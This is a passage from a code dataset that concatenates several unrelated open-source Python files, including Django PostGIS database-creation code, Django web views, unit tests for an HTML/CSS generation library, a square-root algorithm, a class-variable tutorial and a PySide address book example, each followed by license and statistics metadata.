self.rc.AddCmdResult(partial_mock.Ignore(), output=self.SAMPLE_PARTED)
partitions = image_lib.GetImageDiskPartitionInfo(
'_ignored'
)
part_dict = {p.number: p for p in partitions}
self.assertEqual(12, len(part_dict))
self.assertEqual('STATE', part_dict[1].name)
self.assertEqual(2097152000, part_dict[3].size)
self.assertEqual('reserved', part_dict[9].name)
self.assertEqual('reserved', part_dict[10].name)
def testChangeUnitInsideChroot(self):
self.PatchObject(cros_build_lib, 'IsInsideChroot', return_value=True)
self.rc.AddCmdResult(partial_mock.Ignore(), output=self.SAMPLE_CGPT)
partitions = image_lib.GetImageDiskPartitionInfo('_ignored')
part_dict = {p.name: p for p in partitions}
self.assertEqual(part_dict['STATE'].start, 983564288)
self.assertEqual(part_dict['STATE'].size, 1073741824)
| bsd-3-clause | -1,855,077,315,737,941,500 | 42.074576 | 80 | 0.638939 | false |
pygeek/django | django/contrib/gis/db/backends/postgis/creation.py | 1 | 3881 | from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.postgresql_psycopg2.creation import DatabaseCreation
class PostGISCreation(DatabaseCreation):
geom_index_type = 'GIST'
geom_index_opts = 'GIST_GEOMETRY_OPS'
def sql_indexes_for_field(self, model, f, style):
"Return any spatial index creation SQL for the field."
from django.contrib.gis.db.models.fields import GeometryField
output = super(PostGISCreation, self).sql_indexes_for_field(model, f, style)
if isinstance(f, GeometryField):
gqn = self.connection.ops.geo_quote_name
qn = self.connection.ops.quote_name
db_table = model._meta.db_table
if f.geography:
# Geogrophy columns are created normally.
pass
else:
# Geometry columns are created by `AddGeometryColumn`
# stored procedure.
output.append(style.SQL_KEYWORD('SELECT ') +
style.SQL_TABLE('AddGeometryColumn') + '(' +
style.SQL_TABLE(gqn(db_table)) + ', ' +
style.SQL_FIELD(gqn(f.column)) + ', ' +
style.SQL_FIELD(str(f.srid)) + ', ' +
style.SQL_COLTYPE(gqn(f.geom_type)) + ', ' +
style.SQL_KEYWORD(str(f.dim)) + ');')
if not f.null:
# Add a NOT NULL constraint to the field
output.append(style.SQL_KEYWORD('ALTER TABLE ') +
style.SQL_TABLE(qn(db_table)) +
style.SQL_KEYWORD(' ALTER ') +
style.SQL_FIELD(qn(f.column)) +
style.SQL_KEYWORD(' SET NOT NULL') + ';')
if f.spatial_index:
# Spatial indexes created the same way for both Geometry and
# Geography columns.
# PostGIS 2.0 does not support GIST_GEOMETRY_OPS. So, on 1.5
# we use GIST_GEOMETRY_OPS, on 2.0 we use either "nd" ops
# which are fast on multidimensional cases, or just plain
# gist index for the 2d case.
if f.geography:
index_opts = ''
elif self.connection.ops.spatial_version >= (2, 0):
if f.dim > 2:
index_opts = ' ' + style.SQL_KEYWORD('gist_geometry_ops_nd')
else:
index_opts = ''
else:
index_opts = ' ' + style.SQL_KEYWORD(self.geom_index_opts)
output.append(style.SQL_KEYWORD('CREATE INDEX ') +
style.SQL_TABLE(qn('%s_%s_id' % (db_table, f.column))) +
style.SQL_KEYWORD(' ON ') +
style.SQL_TABLE(qn(db_table)) +
style.SQL_KEYWORD(' USING ') +
style.SQL_COLTYPE(self.geom_index_type) + ' ( ' +
style.SQL_FIELD(qn(f.column)) + index_opts + ' );')
return output
def sql_table_creation_suffix(self):
cursor = self.connection.cursor()
cursor.execute('SELECT datname FROM pg_database;')
db_names = [row[0] for row in cursor.fetchall()]
postgis_template = getattr(settings, 'POSTGIS_TEMPLATE', 'template_postgis')
if postgis_template in db_names:
qn = self.connection.ops.quote_name
return ' TEMPLATE %s' % qn(postgis_template)
elif self.connection.ops.spatial_version < (2, 0):
raise ImproperlyConfigured("Template database '%s' does not exist." % postgis_template)
else:
return ''
| bsd-3-clause | -6,418,817,060,973,817,000 | 48.126582 | 99 | 0.509147 | false |
sciencewiz1/datahub | src/datahub/browser/views.py | 1 | 1691 | import json, sys, re, hashlib, smtplib, base64, urllib, os
from auth import *
from core.account import manager
from django.http import *
from django.shortcuts import render_to_response
from django.views.decorators.csrf import csrf_exempt
from django.core.context_processors import csrf
from django.core.validators import email_re
from django.db.utils import IntegrityError
from django.utils.http import urlquote_plus
'''
@author: Anant Bhardwaj
@date: Mar 21, 2013
Datahub Web Handler
'''
@login_required
def user(request, username=None):
try:
if(username):
res = manager.list_databases(username)
return render_to_response("user.html", {'username': username, 'db_names':res['db_names']})
else:
user = request.session[kLogIn]
return HttpResponseRedirect(user)
except KeyError:
return HttpResponseRedirect('/login')
def new_database_form(request, username):
return render_to_response("new_database.html", {'username': username})
@login_required
def new_database(request, username, db_name):
manager.create_database(username, db_name)
return HttpResponseRedirect("/"+username)
@login_required
def database(request, username, db_name):
try:
res = manager.list_tables(db_name)
return render_to_response("database.html", {'username': username, 'db_name':db_name, 'table_names':res['table_names']})
except Exception, e:
return HttpResponse(request_error, mimetype="application/json")
@login_required
def table(request, username, db_name, table_name):
try:
return render_to_response("table.html", {'username': username, 'db_name':db_name, 'table_name':table_name})
except Exception, e:
return HttpResponse(request_error, mimetype="application/json")
| mit | -9,209,395,502,883,774,000 | 28.666667 | 121 | 0.752218 | false |
mikister/webgen | tests/test_dom.py | 1 | 25088 | """Unit tests for `dom.py`.
Todo:
* Add class methods to html tag tests
* Ul (from_list, from_dict, )
* Ol (from_list, from_dict, )
* Table (from_list, )
* Pass an instance of same class as parameter to ElementHTML class (test)
*
"""
import unittest
import os
# Allowing to import modules from parent directory
import sys
from pathlib import Path
sys.path.append(str(Path('.').absolute().parent))
import webgen.dom as dom
test_str = 'Python'
class TestInfrastructureElements(unittest.TestCase):
"""Tests infrastructure classes and functions from `dom.py`.
These classes include: List, Dict, ElementHTML, ElementCSS, ElementJS,
Functions are: compare_path,
"""
def test_List(self):
temp_list = dom.List(test_str, test_str)
self.assertEqual(temp_list.contents, [test_str, test_str],
msg='dom.ElementList.__init__ failed.')
self.assertEqual(temp_list[0], test_str, msg='dom.List.__getitem__ failed.')
temp_list[0] = ''
self.assertEqual(temp_list[0], '', msg='dom.List.__setitem__ failed.')
self.assertEqual(len(temp_list), 2, msg='dom.List.__len__ failed.')
del (temp_list[0])
self.assertEqual(len(temp_list), 1, msg='dom.List.__delitem__ failed.')
temp_list('abc')
self.assertIn('abc', temp_list.contents, msg='dom.List.__call__ failed.')
def test_Dict(self):
temp_dict = dom.Dict(one=test_str, two=test_str)
self.assertEqual(temp_dict.contents, {'one': test_str, 'two': test_str},
msg='dom.Dict.__init__ failed.')
self.assertEqual(temp_dict['one'], test_str, msg='dom.Dict.__getitem__ failed.')
temp_dict['one'] = ''
self.assertEqual(temp_dict['one'], '', msg='dom.Dict.__setitem__ failed.')
self.assertEqual(len(temp_dict), 2, msg='dom.Dict.__len__ failed.')
del (temp_dict['one'])
self.assertEqual(len(temp_dict), 1, msg='dom.Dict.__delitem__ failed.')
temp_dict(abc=test_str)
self.assertIn('abc', temp_dict.contents.keys(), msg='dom.Dict.__call__ failed.')
def test_create_html_file(self):
pass
def test_create_css_file(self):
pass
def test_create_js_file(self):
pass
def test_compare_path(self):
testfoo = dom.compare_path
# When both File1.html and File2.html are in top-most local directory
path1, path2 = 'File1.html', 'File2.html'
self.assertEqual(testfoo(path1, path2),
'File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# When File1.html is in top-most local directory and File2.html is in a local subdirectory
path1, path2 = 'File1.html', '1\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'1\\2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# When File1.html is in a local subdirectory and File2.html is in top-most local directory
path1, path2 = '1\\2\\File1.html', 'File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\..\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# When both File1.html and File2.html are in a local subdirectory
path1, path2 = '1\\2\\File1.html', '1\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\2\\File1.html', '1\\a\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\a\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\a\\File1.html', '1\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\2\\File1.html', '1\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\2\\File1.html', 'a\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\..\\a\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = 'a\\2\\File1.html', '1\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\..\\1\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\File1.html', '1\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\File1.html', 'a\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\a\\2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = 'a\\File1.html', '1\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\1\\2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# Testing different sub-directories with sub-sub-directories of a same name
path1, path2 = '1\\2\\File1.html', 'a\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\..\\a\\2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# path1 is outside local directory
path1, path2 = '..\\File1.html', 'File2.html'
correct_result = os.path.join(os.path.normpath(os.path.basename(os.getcwd())), 'File2.html')
self.assertEqual(testfoo(path1, path2),
correct_result,
msg=f'Finding relative path from {path1} to {path2} failed.')
# path2 is outside local directory
path1, path2 = 'File1.html', '..\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# path1 and path2 are outside local directory
path1, path2 = '..\\File1.html', '..\\File2.html'
self.assertEqual(testfoo(path1, path2),
'File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
def test_ElementHTML(self):
temp_html = dom.ElementHTML('tag', 'arg1', 'arg2', attr1='')
self.assertEqual(temp_html.contents, ['arg1', 'arg2'],
msg='dom.ElementHTML.__init__ does not properly implement dom.List.')
self.assertEqual(temp_html.tag, 'tag', msg='dom.ElementHTML.__init__ does not set `self.tag` property.')
self.assertIn('attr1', temp_html._attributes.keys(),
msg='dom.ElementHTML.__init__ does not set `self.attributes` property.')
temp_html.attributes(attr2='2')
self.assertIn('attr2', temp_html._attributes.keys(),
msg='dom.ElementHTML.attributes does not set `self.attributes` property.')
self.assertEqual(str(temp_html), '<tag attr2=\"2\">arg1arg2</tag>',
msg='dom.ElementHTML.__str__ failed.')
def test_ElementCSS(self):
temp_css = dom.ElementCSS('selector', declaration1='some_text')
test_text = 'selector {\n' \
'\tdeclaration1: some_text;\n' \
'}'
self.assertEqual(str(temp_css), test_text)
def test_ElementJS(self):
# temp_js = dom.ElementJS()
pass
class TestHTMLTags(unittest.TestCase):
"""Tests predefined and custom html tags from `dom.py`."""
def test_custom_tag(self):
custom_tag = dom.custom_tag('tag')
custom_tag_instance = custom_tag(' you\'re it!')
self.assertEqual(str(custom_tag_instance), '<tag> you\'re it!</tag>')
def test_html_tag(self):
temp_tag = dom.HTML('innerHTML')
self.assertEqual(str(temp_tag), '<html>innerHTML</html>')
def test_head_tag(self):
temp_tag = dom.Head('innerHTML')
self.assertEqual(str(temp_tag), '<head>innerHTML</head>')
def test_body_tag(self):
temp_tag = dom.Body('innerHTML')
self.assertEqual(str(temp_tag), '<body>innerHTML</body>')
def test_title_tag(self):
temp_tag = dom.Title('innerHTML')
self.assertEqual(str(temp_tag), '<title>innerHTML</title>')
def test_meta_tag(self):
temp_tag = dom.Meta('innerHTML')
self.assertEqual(str(temp_tag), '<meta>')
def test_link_tag(self):
temp_tag = dom.Link('innerHTML')
self.assertEqual(str(temp_tag), '<link>')
def test_link_dynamic_href(self):
Linked_File = dom.File('', 'stylesheet', 'css')
temp_tag = dom.Link(href=Linked_File)
File1 = dom.FileHTML('', 'File1', temp_tag, doctype='<!doctype html>')
self.assertEqual(str(File1),
'<!doctype html>\n' \
'<link href="stylesheet.css">\n')
def test_paragraph_tag(self):
temp_tag = dom.P('innerHTML')
self.assertEqual(str(temp_tag), '<p>innerHTML</p>')
def test_header_tag(self):
temp_tag = dom.H('innerHTML', size=2)
self.assertEqual(str(temp_tag), '<h2>innerHTML</h2>')
def test_anchor_tag(self):
temp_tag = dom.A('innerHTML')
self.assertEqual(str(temp_tag), '<a>innerHTML</a>')
def test_anchor_dynamic_href(self):
mock_html = dom.HTML()
File2 = dom.FileHTML('', 'File2', mock_html, doctype='<!doctype html>')
temp_tag = dom.A(href=File2)
File1 = dom.FileHTML('', 'File1', temp_tag, doctype='<!doctype html>')
self.assertEqual(str(File1),
'<!doctype html>\n' \
'<a href="File2.html"></a>\n')
def test_div_tag(self):
temp_tag = dom.Div('innerHTML')
self.assertEqual(str(temp_tag), '<div>innerHTML</div>')
def test_script_tag(self):
temp_tag = dom.Script('innerHTML')
self.assertEqual(str(temp_tag), '<script>innerHTML</script>')
def test_script_dynamic_src(self):
mock_js = dom.ElementJS()
JSFile = dom.FileJS('', 'javascript', mock_js)
temp_tag = dom.Script('innerHTML', src=JSFile)
File1 = dom.FileHTML('', 'File1', temp_tag, doctype='<!doctype html>')
self.assertEqual(str(File1),
'<!doctype html>\n' \
'<script src="javascript.js">innerHTML</script>\n')
def test_image_tag(self):
temp_tag = dom.Img('innerHTML')
self.assertEqual(str(temp_tag), '<img>')
def test_image_dynamic_src(self):
Image = dom.File('Folder1\\', 'Image', 'png')
temp_tag = dom.Img(src=Image)
File1 = dom.FileHTML('', 'File1', temp_tag, doctype='<!doctype html>')
self.assertEqual(str(File1),
'<!doctype html>\n' \
'<img src="Folder1\\Image.png">\n')
def test_ul_tag(self):
temp_tag = dom.Ul('innerHTML')
self.assertEqual(str(temp_tag), '<ul>innerHTML</ul>')
def test_ol_tag(self):
temp_tag = dom.Ol('innerHTML')
self.assertEqual(str(temp_tag), '<ol>innerHTML</ol>')
def test_li_tag(self):
temp_tag = dom.Li('innerHTML')
self.assertEqual(str(temp_tag), '<li>innerHTML</li>')
def test_table_tag(self):
temp_tag = dom.Table('innerHTML')
self.assertEqual(str(temp_tag), '<table>innerHTML</table>')
def test_tablerow_tag(self):
temp_tag = dom.Tr('innerHTML')
self.assertEqual(str(temp_tag), '<tr>innerHTML</tr>')
def test_tableheader_tag(self):
temp_tag = dom.Th('innerHTML')
self.assertEqual(str(temp_tag), '<th>innerHTML</th>')
def test_tablecell_tag(self):
temp_tag = dom.Td('innerHTML')
self.assertEqual(str(temp_tag), '<td>innerHTML</td>')
def test_hr_tag(self):
temp_tag = dom.Hr('innerHTML')
self.assertEqual(str(temp_tag), '<hr>')
def test_br_tag(self):
temp_tag = dom.Br('innerHTML')
self.assertEqual(str(temp_tag), '<br>')
def test_style_tag(self):
temp_tag = dom.Style('innerHTML')
self.assertEqual(str(temp_tag), '<style>innerHTML</style>')
def test_center_tag(self):
temp_tag = dom.Center('innerHTML')
self.assertEqual(str(temp_tag), '<center>innerHTML</center>')
class TestCSSElements(unittest.TestCase):
"""Tests predefined css elements from `dom.py`."""
def test_element_selector(self):
temp_ele = dom.SelectorElement('this_is_element')
test_text = 'this_is_element {\n' \
'}'
self.assertEqual(str(temp_ele), test_text)
def test_id_selector(self):
temp_id = dom.SelectorId('this_is_id')
test_text = '#this_is_id {\n' \
'}'
self.assertEqual(str(temp_id), test_text)
def test_class_selector(self):
temp_cls = dom.SelectorClass('this_is_class')
test_text = '.this_is_class {\n' \
'}'
self.assertEqual(str(temp_cls), test_text)
class TestCSSDeclarations(unittest.TestCase):
"""Tests predefined css declarations from `dom.py`."""
def test_predefined_css_declarations(self):
temp_css = dom.ElementCSS('')
temp_css.color('')
self.assertIn('color', temp_css.contents.keys(), msg='dom._CSSDeclarations.color failed.')
temp_css.direction('')
self.assertIn('direction', temp_css.contents.keys(), msg='dom._CSSDeclarations.direction failed.')
temp_css.letter_spacing('')
self.assertIn('letter-spacing', temp_css.contents.keys(), msg='dom._CSSDeclarations.spacing_letter failed.')
temp_css.word_spacing('')
self.assertIn('word-spacing', temp_css.contents.keys(), msg='dom._CSSDeclarations.spacing_word failed.')
temp_css.line_height('')
self.assertIn('line-height', temp_css.contents.keys(), msg='dom._CSSDeclarations.line_height failed.')
temp_css.txt_align('')
self.assertIn('text-align', temp_css.contents.keys(), msg='dom._CSSDeclarations.align_txt failed.')
temp_css.vertical_align('')
self.assertIn('vertical-align', temp_css.contents.keys(), msg='dom._CSSDeclarations.align_vertical failed.')
temp_css.txt_deco('')
self.assertIn('text-decoration', temp_css.contents.keys(), msg='dom._CSSDeclarations.txt_deco failed.')
temp_css.txt_indent('')
self.assertIn('text-indent', temp_css.contents.keys(), msg='dom._CSSDeclarations.txt_indent failed.')
temp_css.txt_shadow('')
self.assertIn('text-shadow', temp_css.contents.keys(), msg='dom._CSSDeclarations.txt_shadow failed.')
temp_css.txt_transform('')
self.assertIn('text-transform', temp_css.contents.keys(), msg='dom._CSSDeclarations.txt_transform failed.')
temp_css.txt_overflow('')
self.assertIn('text-overflow', temp_css.contents.keys(), msg='dom._CSSDeclarations.txt_overflow failed.')
temp_css.unicode('')
self.assertIn('unicode-bidi', temp_css.contents.keys(), msg='dom._CSSDeclarations.unicode failed.')
temp_css.whitespace('')
self.assertIn('white-space', temp_css.contents.keys(), msg='dom._CSSDeclarations.white_space failed.')
temp_css.font('')
self.assertIn('font', temp_css.contents.keys(), msg='dom._CSSDeclarations.font failed.')
temp_css.font_family('')
self.assertIn('font-family', temp_css.contents.keys(), msg='dom._CSSDeclarations.font_family failed.')
temp_css.font_size('')
self.assertIn('font-size', temp_css.contents.keys(), msg='dom._CSSDeclarations.font_size failed.')
temp_css.font_style('')
self.assertIn('font-style', temp_css.contents.keys(), msg='dom._CSSDeclarations.font_style failed.')
temp_css.font_variant('')
self.assertIn('font-variant', temp_css.contents.keys(), msg='dom._CSSDeclarations.font_variant failed.')
temp_css.font_weight('')
self.assertIn('font-weight', temp_css.contents.keys(), msg='dom._CSSDeclarations.font_weight failed.')
temp_css.bg('')
self.assertIn('background', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg failed.')
temp_css.bg_color('')
self.assertIn('background-color', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg_color failed.')
temp_css.bg_img('')
self.assertIn('background-image', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg_img failed.')
temp_css.bg_repeat('')
self.assertIn('background-repeat', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg_repeat failed.')
temp_css.bg_attachment('')
self.assertIn('background-attachment', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg_attachment failed.')
temp_css.bg_pos('')
self.assertIn('background-position', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg_pos failed.')
temp_css.border('')
self.assertIn('border', temp_css.contents.keys(), msg='dom._CSSDeclarations.border failed.')
temp_css.border_b('')
self.assertIn('border-bottom', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_b failed.')
temp_css.border_l('')
self.assertIn('border-left', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_l failed.')
temp_css.border_r('')
self.assertIn('border-right', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_r failed.')
temp_css.border_t('')
self.assertIn('border-top', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_t failed.')
temp_css.border_color('')
self.assertIn('border-color', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_color failed.')
temp_css.border_radius('')
self.assertIn('border-radius', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_radius failed.')
temp_css.border_style('')
self.assertIn('border-style', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_style failed.')
temp_css.border_width('')
self.assertIn('border-width', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_width failed.')
temp_css.border_collapse('')
self.assertIn('border-collapse', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_collapse failed.')
temp_css.border_spacing('')
self.assertIn('border-spacing', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_spacing failed.')
temp_css.caption_side('')
self.assertIn('caption-side', temp_css.contents.keys(), msg='dom._CSSDeclarations.caption_side failed.')
temp_css.empty_cells('')
self.assertIn('empty-cells', temp_css.contents.keys(), msg='dom._CSSDeclarations.empty_cells failed.')
temp_css.table_layout('')
self.assertIn('table-layout', temp_css.contents.keys(), msg='dom._CSSDeclarations.table_layout failed.')
temp_css.margin('')
self.assertIn('margin', temp_css.contents.keys(), msg='dom._CSSDeclarations.margin failed.')
temp_css.margin_b('')
self.assertIn('margin-bottom', temp_css.contents.keys(), msg='dom._CSSDeclarations.margin_b failed.')
temp_css.margin_l('')
self.assertIn('margin-left', temp_css.contents.keys(), msg='dom._CSSDeclarations.margin_l failed.')
temp_css.margin_t('')
self.assertIn('margin-top', temp_css.contents.keys(), msg='dom._CSSDeclarations.margin_t failed.')
temp_css.margin_r('')
self.assertIn('margin-right', temp_css.contents.keys(), msg='dom._CSSDeclarations.margin_r failed.')
temp_css.padding('')
self.assertIn('padding', temp_css.contents.keys(), msg='dom._CSSDeclarations.padding failed.')
temp_css.padding_b('')
self.assertIn('padding-bottom', temp_css.contents.keys(), msg='dom._CSSDeclarations.padding_b failed.')
temp_css.padding_l('')
self.assertIn('padding-left', temp_css.contents.keys(), msg='dom._CSSDeclarations.padding_l failed.')
temp_css.padding_t('')
self.assertIn('padding-top', temp_css.contents.keys(), msg='dom._CSSDeclarations.padding_t failed.')
temp_css.padding_r('')
self.assertIn('padding-right', temp_css.contents.keys(), msg='dom._CSSDeclarations.padding_r failed.')
temp_css.height('')
self.assertIn('height', temp_css.contents.keys(), msg='dom._CSSDeclarations.height failed.')
temp_css.max_height('')
self.assertIn('max-height', temp_css.contents.keys(), msg='dom._CSSDeclarations.height_max failed.')
temp_css.min_height('')
self.assertIn('min-height', temp_css.contents.keys(), msg='dom._CSSDeclarations.height_min failed.')
temp_css.width('')
self.assertIn('width', temp_css.contents.keys(), msg='dom._CSSDeclarations.width failed.')
temp_css.max_width('')
self.assertIn('max-width', temp_css.contents.keys(), msg='dom._CSSDeclarations.width_max failed.')
temp_css.min_width('')
self.assertIn('min-width', temp_css.contents.keys(), msg='dom._CSSDeclarations.width_min failed.')
temp_css.outline('')
self.assertIn('outline', temp_css.contents.keys(), msg='dom._CSSDeclarations.outline failed.')
temp_css.outline_color('')
self.assertIn('outline-color', temp_css.contents.keys(), msg='dom._CSSDeclarations.outline_color failed.')
temp_css.outline_off('')
self.assertIn('outline-offset', temp_css.contents.keys(), msg='dom._CSSDeclarations.outline_off failed.')
temp_css.outline_style('')
self.assertIn('outline-style', temp_css.contents.keys(), msg='dom._CSSDeclarations.outline_style failed.')
temp_css.outline_width('')
self.assertIn('outline-width', temp_css.contents.keys(), msg='dom._CSSDeclarations.outline_width failed.')
temp_css.list_style('')
self.assertIn('list-style', temp_css.contents.keys(), msg='dom._CSSDeclarations.list failed.')
temp_css.list_style_img('')
self.assertIn('list-style-image', temp_css.contents.keys(), msg='dom._CSSDeclarations.list_img failed.')
temp_css.list_style_pos('')
self.assertIn('list-style-position', temp_css.contents.keys(), msg='dom._CSSDeclarations.list_pos failed.')
temp_css.list_style_type('')
self.assertIn('list-style-type', temp_css.contents.keys(), msg='dom._CSSDeclarations.list_type failed.')
temp_css.display('')
self.assertIn('display', temp_css.contents.keys(), msg='dom._CSSDeclarations.display failed.')
temp_css.visible('')
self.assertIn('visibility', temp_css.contents.keys(), msg='dom._CSSDeclarations.visible failed.')
temp_css.pos('')
self.assertIn('position', temp_css.contents.keys(), msg='dom._CSSDeclarations.pos failed.')
temp_css.bottom('')
self.assertIn('bottom', temp_css.contents.keys(), msg='dom._CSSDeclarations.bottom failed.')
temp_css.left('')
self.assertIn('left', temp_css.contents.keys(), msg='dom._CSSDeclarations.left failed.')
temp_css.top('')
self.assertIn('top', temp_css.contents.keys(), msg='dom._CSSDeclarations.top failed.')
temp_css.right('')
self.assertIn('right', temp_css.contents.keys(), msg='dom._CSSDeclarations.right failed.')
temp_css.clip('')
self.assertIn('clip', temp_css.contents.keys(), msg='dom._CSSDeclarations.clip failed.')
temp_css.z_ind('')
self.assertIn('z-index', temp_css.contents.keys(), msg='dom._CSSDeclarations.z_ind failed.')
temp_css.overflow('')
self.assertIn('overflow', temp_css.contents.keys(), msg='dom._CSSDeclarations.overflow failed.')
temp_css.overflowX('')
self.assertIn('overflow-x', temp_css.contents.keys(), msg='dom._CSSDeclarations.overflowX failed.')
temp_css.overflowY('')
self.assertIn('overflow-y', temp_css.contents.keys(), msg='dom._CSSDeclarations.overflowY failed.')
temp_css.clear('')
self.assertIn('clear', temp_css.contents.keys(), msg='dom._CSSDeclarations.clear failed.')
temp_css.float('')
self.assertIn('float', temp_css.contents.keys(), msg='dom._CSSDeclarations.float failed.')
if __name__ == '__main__':
unittest.main()
| mit | -2,836,461,636,050,776,000 | 40.813333 | 122 | 0.601044 | false |
downquark/algorithms | square_root.py | 1 | 1141 | from math import floor
def sqrt(S):
"""Given an integer, return the square root.
A continued fraction expansion implementation.
https://en.wikipedia.org/wiki/Methods_of_computing_square_roots#Continued_fraction_expansion
Args:
S: Any natural number
"""
i = 0
s = 1
if S == 0 or S == 1: return S
while s ** 2 < S:
if i ** 2 == S:
return i
s = s * 2
i += 1
return __search((s / 2), s, S)
def __search(i, k, S):
j = i + ((k - i) / 2)
s = j ** 2
if s == S:
return j
elif k == i + 1:
return __continued_fraction(S, [j], 1, 0)
elif s > S:
return __search(i, j, S)
elif s < S:
return __search(j, k, S)
def __continued_fraction(S, a, d_n, m_n):
n = len(a) - 1
m_1 = (d_n * a[n]) - m_n
d_1 = (S - m_1 ** 2) / d_n
a_1 = int(floor((a[0] + m_1) / d_1))
a.append(a_1)
if a_1 != 2 * a[0] and len(a) < 11:
return __continued_fraction(S, a, d_1, m_1)
else:
result = 1.0
while len(a):
result = a.pop() + (1 / result)
return result | gpl-2.0 | 7,549,270,143,950,171,000 | 24.377778 | 100 | 0.468887 | false |
brucework/demo | src/python/hello/objvar.py | 1 | 1332 | #!/usr/bin/python
#Filename: objvar.py
class Person:
"'Represents a person.'"
population = 0
def __init__(self, name):
''''Initializes the person's data.'''
self.name = name
print '(Initializing %s)'% self.name
#When this person is created, he/she
#adds to the population
Person.population += 1
def __del__(self):
"I am dying."
print '%s says bye.' %self.name
Person.population -= 1
if Person.population == 0:
print 'I am the last one.'
else:
print 'There are still %d people left.'%Person.population
def sayHi(self):
'''Greeting by the person.
Really, that's all it does.'''
print 'Hi, my name is %s.'%self.name
def howMany(self):
'''Prints the current population.'''
if Person.population == 1:
print 'I am the only person here.'
else:
print 'We have %d personshere.' %Person.population
swaroop = Person('Swaroop')
swaroop.sayHi()
swaroop.howMany()
bruce = Person('bruce A')
bruce.sayHi()
bruce.howMany()
test = Person('test 120')
test.sayHi()
test.howMany()
del test
kalam = Person('A bdul K alam')
kalam.sayHi()
kalam.howMany()
del swaroop
del bruce
del kalam
#swaroop.sayHi()
#swaroop.howMany()
| gpl-3.0 | 8,220,158,943,830,193,000 | 19.492308 | 69 | 0.583333 | false |
Southpaw-TACTIC/Team | src/python/Lib/site-packages/PySide/examples/tutorials/addressbook/part4.py | 1 | 9061 | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2009 Nokia Corporation and/or its subsidiary(-ies).
## Contact: Qt Software Information ([email protected])
##
## This file is part of the example classes of the Qt Toolkit.
##
#############################################################################
from PySide import QtCore, QtGui
class SortedDict(dict):
class Iterator(object):
def __init__(self, sorted_dict):
self._dict = sorted_dict
self._keys = sorted(self._dict.keys())
self._nr_items = len(self._keys)
self._idx = 0
def __iter__(self):
return self
def next(self):
if self._idx >= self._nr_items:
raise StopIteration
key = self._keys[self._idx]
value = self._dict[key]
self._idx += 1
return key, value
__next__ = next
def __iter__(self):
return SortedDict.Iterator(self)
iterkeys = __iter__
class AddressBook(QtGui.QWidget):
NavigationMode, AddingMode, EditingMode = range(3)
def __init__(self, parent=None):
super(AddressBook, self).__init__(parent)
self.contacts = SortedDict()
self.oldName = ''
self.oldAddress = ''
self.currentMode = self.NavigationMode
nameLabel = QtGui.QLabel("Name:")
self.nameLine = QtGui.QLineEdit()
self.nameLine.setReadOnly(True)
addressLabel = QtGui.QLabel("Address:")
self.addressText = QtGui.QTextEdit()
self.addressText.setReadOnly(True)
self.addButton = QtGui.QPushButton("&Add")
self.addButton.show()
self.editButton = QtGui.QPushButton("&Edit")
self.editButton.setEnabled(False)
self.removeButton = QtGui.QPushButton("&Remove")
self.removeButton.setEnabled(False)
self.submitButton = QtGui.QPushButton("&Submit")
self.submitButton.hide()
self.cancelButton = QtGui.QPushButton("&Cancel")
self.cancelButton.hide()
self.nextButton = QtGui.QPushButton("&Next")
self.nextButton.setEnabled(False)
self.previousButton = QtGui.QPushButton("&Previous")
self.previousButton.setEnabled(False)
self.addButton.clicked.connect(self.addContact)
self.submitButton.clicked.connect(self.submitContact)
self.editButton.clicked.connect(self.editContact)
self.removeButton.clicked.connect(self.removeContact)
self.cancelButton.clicked.connect(self.cancel)
self.nextButton.clicked.connect(self.next)
self.previousButton.clicked.connect(self.previous)
buttonLayout1 = QtGui.QVBoxLayout()
buttonLayout1.addWidget(self.addButton)
buttonLayout1.addWidget(self.editButton)
buttonLayout1.addWidget(self.removeButton)
buttonLayout1.addWidget(self.submitButton)
